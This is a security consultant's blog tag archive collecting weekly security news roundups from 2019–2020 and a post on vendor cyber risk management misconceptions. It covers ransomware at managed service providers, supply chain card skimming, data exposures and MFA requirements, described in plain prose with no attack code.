Tag Archives: VCRM

Security News Bites for the Week Ending July 31, 2020

Many Cyberspace Solarium Commission Recommendations Likely to Become Law

The Cyberspace Solarium Commission was a blue ribbon commission that made recommendations to Congress earlier this year on improving government cybersecurity. It appears that many of their recommendations are being added to the National Defense Authorization Act, which is “must pass” bill to fund the military. President Trump has said that he will veto it because it directs the Pentagon to rename bases named after Confederate Generals. Stay tuned; that sausage is still being made. If they do remain in the bill, that would be a great thing. Credit: CSO Online

Fintech “Dave” Exposed 7.5 Million Customers’ Data

Fintechs, those Internet firms that act as an intermediary between your financial institutions and you, are not regulated in the same way that say, banks are. Fintech Dave (yes, that is their name) exposed data on 7.5 million customers as a result of a breach at one of their vendors. One more time, vendor cyber risk management is an issue and Dave will wind up with the lawsuits and fines. While credit card data was not exposed, passwords, which were very weakly encrypted, were compromised. Credit: Dark Reading

IRS “Recommends” 2FA – Makes it Mandatory Next Year

IRS is “Recommending” Tax Pros Use Multi-factor Authentication, especially when working from home. They say that most of the data thefts reported to the IRS this year by tax pros could have been avoided if they used multi-factor authentication. Starting in 2021, this will be mandatory for all providers of tax software. The IRS seems to recommend two factor apps like Google Authenticator over SMS messages which are easier to hack. Credit: Bleeping Computer

5G is Here – Sort Of

The article says “After years of hype, 5G making progress in the US”. While true, there is less to the statement than most people would like. Last week AT&T joined T-Mobile in claiming that have deployed 5G nationwide. While this is a true statement, they are doing it using the low frequency band. They are doing this because they can cover the country with an order of magnitude less cell sites. Unfortunately, this also means that the speed that you will see after you fork over a thousand bucks for a new 5G phone is basically the same as the speed you currently have with your current phone without spending the money on the new phone and new plan. For details, read the article in USA Today.

Is This Becoming a Thing-Another MSP Ransomed

A couple of weeks ago it was a Managed Service Provider in Denver.  A few weeks before that, it was one in Wisconsin.  This week it is Irvine, CA based Synoptek with more than 1,100 customers including state and local governments, financial services and healthcare.  Their web site says that they did more than $100 million in business last year.

Someone captured a Tweet of theirs before they deleted it:

Now that they were hit by a ransomware attack which encrypted customer data on Christmas Eve, they probably wished they took their own advice.

They are being very quiet about the whole thing, but reports say that it infected a subset of their customers and that they paid the ransom.  Hopefully they have insurance to cover the cost.

Unlike the attack in Colorado, it looks like these guys were better prepared and were able to contain the attack and are working quickly to mitigate it.

Several thoughts here:

  • It looks like this *IS* becoming a thing because for an MSP, if they don’t pay the ransom, if they don’t decrypt their clients’ data, if they don’t minimize the consequences, they are likely out of business.  From an attacker’s standpoint, this is THE BEST scenario.
  • Since there are likely tens of thousands of these service providers out there from mom & pop shops to a few hundred employees (Synoptek has about 700 peops), there is no shortage of opportunities
  • As an MSP’s customer, you want to ask those embarrassing questions like do you have insurance, are you prepared and how long would I be down?
  • This attack also went after the remote control software, which is a weak spot for MSPs.  There are some options when it comes to this, so you might want to ask questions.
  • When it comes to *YOU*, you need to make sure you are prepared-
  • Do you have your own backups?
  • Do you have a monitoring and alerting system to detect the problem quickly (we have a cost effective solution)?
  • What is your plan if one or more of your service providers is down for a day?  For a week? For a couple of weeks?  Goes out of business?
  • Can you continue to do business while you are down?
  • While the total number of businesses impacted by just these three attacks that did hit the news is around, best guess, one thousand companies, that is just 3 attacks.  This will likely get uglier before it gets better.

And just to lighten things up a bit, check out this YouTube clip from the animated movie Hoodwinked.  He has a good suggestion – https://www.youtube.com/watch?v=HUIP208nZZs

Source: Brian Krebs

Security News for the Week Ending July 5, 2019

This is What Spies Do

It has come out that western (read one or more of the five eyes countries) inserted malware into Yandex (Russia’s equivalent of Google) in order to steal administrative credentials.  The purpose was, apparently, to read emails of interest to the western spies.  We need to understand that we do it to them and they do it to us, but the idea is to make it hard for them and easy for us.  Source: Reuters.

Firms That Claim to be Able to Reverse Ransomware Sometimes Lie

Another so called “Data Recovery” firms that claim to be able to recover from ransomware just pay the ransom and mark the cost up.  The most recent firm to be outed is Red Mosquito Data Recovery was outed when they were the target of the sting.  The researcher played the role of both the victim and the ransomer and discovered what Red Mosquito was doing.  Remember that if you do pay the ransom, you still need to rebuild your systems from the ground up because you do not know what time bombs or back doors the ransomer left behind.   Source: Propublica,

Trump Changes His Mind – Huawei Not a National Security Threat?

After Tweeting for months that Huawei is a national security threat; that their equipment needs to be banned in the US and abroad and that existing equipment needs to be removed — to it is okay if we sell Huawei parts.  This happened the day after he met with Xi at the G20 and it is reported Xi told him that the trade war would continue until the ban was removed.  While not removed, it is a hole wide enough to drive a tractor trailer through.  Source: The Register.

One Terabyte of Police Bodycam Video Available on the Dark Web

In another example of companies not requiring vendors to have adequate cybersecurity programs in place, researchers found a terabyte (that is 1,000,000,000,000 bytes) of police bodycam video from Miami and other cities available on the dark web.  It is likely this video has been copied and sold.  Miami PD is not talking.  Probably a good time for the police to plead the Fifth.  The problem is linked back to 5 IT vendors who did not protect the data.   Either police departments did not care (worst cast) or do proper due diligence (best case).  I hope they have a bunch of insurance because you know that there will be lawsuits.  At some point people will figure out that even though vendor cyber due diligence is hard, getting sued and defending yourself is even harder.  Source: The Register.

If China Can’t Buy Memory Chips From the US, it will Get into the Memory Biz and Compete Against Us

In the trade wars are hard department, the Chinese just convinced the Godfather of Japan’s DRAM business to come to China and head up a company that plans to build its own memory chips.  This is likely the result of the current trade war.

If successful, the result will be that western memory chip makers will lose all of their sales to China, but more importantly, China might flood the market with cheap memory chips, damaging the worldwide multi-billion dollar memory business.  Source: The Register.

Microsoft to Require CSPs to Use Multi-Factor Auth

In light of the recent leak of details on Cloud Hopper, Microsoft is becoming very visible and requiring their O.365 resellers to use multi-factor authentication in order to reduce the risk that they represent to the ecosystem.  This is a proactive effort on their part – likely – as  they have not been publicly named as a cloud hopper victim, but they certainly are a target.  Source: Brian Krebs.

 

Presidential Alerts Spoofable

Okay, no jokes about our current President’s love of twitter.

Researchers at the University of Colorado (CU) have demonstrated how easy it is to spoof the Presidential alerts – assuming you even get them (you may remember they tested the system last year and lots of people, including me, didn’t get the test).

In this case, the CU researchers say that 4 low power base stations could target every person in a football stadium of say 50,000, causing mass panic.    While it might be hard to get these briefcase size devices inside a football stadium, it would be pretty easy to get it into soft targets like office buildings or shopping centers and depending on the message (Ex: Inbound nukes from China; will detonate here in 10 minutes), could cause mass panic.  Source: BBC

Supply Chain Attacks Are Going Strong

This time the attack is against an eCommerce platform, PrismWeb, that is used by College bookstores.

The attack is similar to other attacks, in the the hackers somehow got into the company’s system and inserted a tiny bit of Javascript that steals credit card data – very similar to Magecart that is affecting sites from TicketMaster to British Airways.  PrismWeb is integrated into the various college bookstore websites and when a student goes to checkout, the malware is downloaded from PrismWeb as part of the Javascript needed to operate the checkout process.

These attackers are clever in that the attacks take the data, format it as JSON, encrypt it and upload it in a way to make it look like Google Analytics data.

The data being stolen is credit card number, expiration date, CVV, billing name an address and phone.

Over 200 college bookstores have been affected, translating to tens of thousands of students – or more.

What is important to understand here is the concept, not the fact that 200+ colleges have been impacted.

If you use a service and that service has access to your data (remember card data is only one class of data these guys might want – trade secrets and medical data are two others, for example), you are potentially at risk if you don’t protect yourself.

One thing that all of these attacks have in common is that the data is being uploaded from your site to the attackers.  If your site should not be uploading data unsolicitedly (as in not in direct response to a user’s query), you need to be aware id this is happening and alert.

Of course, attackers can change their MO, but so far, of the thousands of sites affected, this is a common theme.

Ultimately, the problem is with the vendor.  Somehow they were compromised.  And the compromise was not detected.

In this case the customers – the 200+ college bookstores – are left to clean up the mess from the vendor.

MAYBE they will be compensated.  Maybe they will have to sue their vendor (that is no fun and will not get them any money for years, even if they win).  That is all a function of how well their Vendor Cyber Risk Management process works.

Ultimately, it is your problem to deal with and right now, most companies are not paying enough attention to it and the hackers are having a field day.  That is, until they are hacked.  At which point they throw millions at it.  Not a great strategy  – for YOU or for YOUR CUSTOMERS.

Source:  Bleeping Computer.

 

Vendor Risk Management Common Misconceptions

If yesterday’s post (on Asus) and many of my posts in the past are any indication,  supply chain risk is a huge problem and not very well handled at many companies.  Part of the reason why is all of the misconceptions we have.  Here are a few and why they are misconceptions:

The vendor is a large company; surely they have a great security program.

Equifax was a vendor to thousands of companies.  No problem here.

Marriott was a vendor to millions of customers.  Any problems?

The DoD Office of Personnel Management had 25 million customers.

You get the idea.

We haven’t given the vendor any Non-public Personal Information (NPI) so there is not much risk.

More states are shifting the standard of care to personally identifiable information (PII).  That is a much bigger footprint.  If the vendor has your customer’s PII and the vendor has a breach, guess who is on the hook legally?  Answer: you.  Because you picked the vendor.

The vendor is privately held, so we can’t get any information on them.

Even if the vendor is privately held you can ask for information.    You can ask for an accountant’s statement.  You can ask about their cybersecurity program.  You can ask for a lot of information.  Do so.

We don’t give our vendor data in electronic format, so there is not much risk.

While paper is lower risk, it is not no risk.  Your shredding service only gets paper.  Likewise your document storage vendor.  Consider each situation carefully.

The vendor’s security is probably good because they are well known.

Target is well known.

Home Depot is well known.

Marriott is well known.

And hundreds of others.  Any questions?

Our vendor was hacked, but they say that they fixed the problem.

Maybe, but maybe not.  It depends.  Did they put a band-aid on the problem or did they fix the systemic issues underlying it.  Ask questions.  This will likely take a bit of digging, but do it anyway.

This vendor has a breakthrough product; surely their security is good too.

Again maybe, but maybe not.  Sometimes breakthrough features are deemed to be more important than security and privacy.  Don’t assume.

The vendor won’t give us what we ask for so we are out of luck.

Maybe.  How important is what you are asking for?  Should you consider a different vendor?  Will they let you look at it but not keep it  (maybe in person or maybe over a web conference)?  Is there alternative information that would work?  They do likely want your business, so engage them to help you figure it out.

The vendors security program looks strong, so their third parties (our fourth parties) are strong too, right?

Maybe, but that is a bit of a stretch.  Review their vendor cyber risk management program first before you make that assumption, especially if the fourth party has your sensitive data.

I would never fall for a phishing attack so I am sure that our vendor wouldn’t either.  We don’t need no stinkin’ training and neither do they.

That is so wrong on so many levels.  We have many stories of businesses that didn’t need training that fell for phishing scams, lost sensitive data or even lost hundreds of thousands of dollars.  While training doesn’t fix everything, it is important.  Don’t skip the training and training is not a one time event.

These are just a few of the misconceptions, there are many more.

If your vendor has a breach, you are on the hook.  Maybe they are too, but you are first and foremost.  Your customers look to you to protect their data.

If you need help with your vendor cyber risk management program, contact us.

Security News Bites for the Week Ending January 25, 2019

Oklahoma Government Data Left Unprotected

The Oklahoma Department of Securities left data going back to at least 1999 unprotected online.  Data exposed included state agency passwords and login information, data on FBI investigations, information on thousands of securities brokers and other information.  The state says it was unprotected for “a limited duration”.  They are investigating.  Source: The Hacker News.

 

NOYB Files More GDPR Complaints

None of Your Business, the non-profit founded by Austrian privacy activist, lawyer and Faceboook-thorn-in-their-side has filed 10 complaints with the Austrian Data Protection Authority.

They say that companies are not fully complying with the requirements of GDPR in providing data to requestors and some companies didn’t even bother to reply at all.  For the most part, they said that companies did not tell people who they shared data with, the source of the data or how long they stored it for.

Beware, this is only the beginning of challenges for companies that have built their business models on selling your data.  The press release also shows the MAXIMUM potential fine (not likely), which ranges from 20 million to 6.3 billion Euros.  Source: NOYB .

 

Another Zero Click WiFi Firmware Bug

Security researcher Denis Selianin has released the code for a WiFi firmware bug he presented a paper on last year.  The code works on ThreadX and Marvell Avastar WiFi driver code and allows an attacker to take over a system even if the device is not connected to WiFi.  Affected devices include the Sony Playstation 4, Microsoft Surface, Xbox One, Samsung Chromebook, Galaxy J1 and other devices.  All it takes is for the device to be powered on.

I am not aware of a patch for the firmware of WiFi devices to fix this and likely, for most WiFi devices, the risk will remain active until the device winds up in a landfill or recycling center, even if a patch is released.  Source:  Helpnet Security.

 

Apple Releases Patches For iPhone, Mac and Wearables

Apple has released patches for the iPhones (and other i-devices) that include several remote code execution bugs (vulnerabilities that can be exploited remotely) including FaceTime, Bluetooth and 8 bugs in the Webkit web browser.  The iOS kernel had 6 vulnerabilities patched that allowed an attacker to elevate his or her privilege level.

The macOS had similar patches since much of the same software runs on the Mac, but there were Mac unique bugs as well.

Rounding out the patch set were patches for the Apple watch and Apple TV.

At one time Apple software was simpler and therefore less buggy, but over time it has gotten more complex and therefore more vulnerable.  Source: The Register.

Data Analytics Firm Ascension Reveals 24 Million Mortgage Related Documents

Ascension, a data analytics firm, left a stash of 24 million mortgage related documents exposed.  it is not clear who owns the data belonging to tens of thousands of loans, but it appears that the originators of the loans include Citi, Wells, Capital One and HUD.  Ascension’s parent company Rocktop, owns a portfolio of 46,000 loans, but we don’t know if these are theirs.

While they think the loan documents were only exposed for a few weeks, that is certainly enough time for a bad guy to find them.  After all, a researcher found them. Now Ascension is having to notify all of the affected parties and I am sure that the lawsuits will begin shortly.

If this isn’t a poster child for making sure that your VENDOR CYBER RISK MANAGEMENT PROGRAM is in order, I don’t know what to say.

This could be a third party cyber risk problem *OR* it could be a fourth party cyber risk problem.  In either case, if your vendor cyber risk management house is not in order, it will likely be YOUR problem.  Now would be a good time to review your program.  Source:  Housingwire.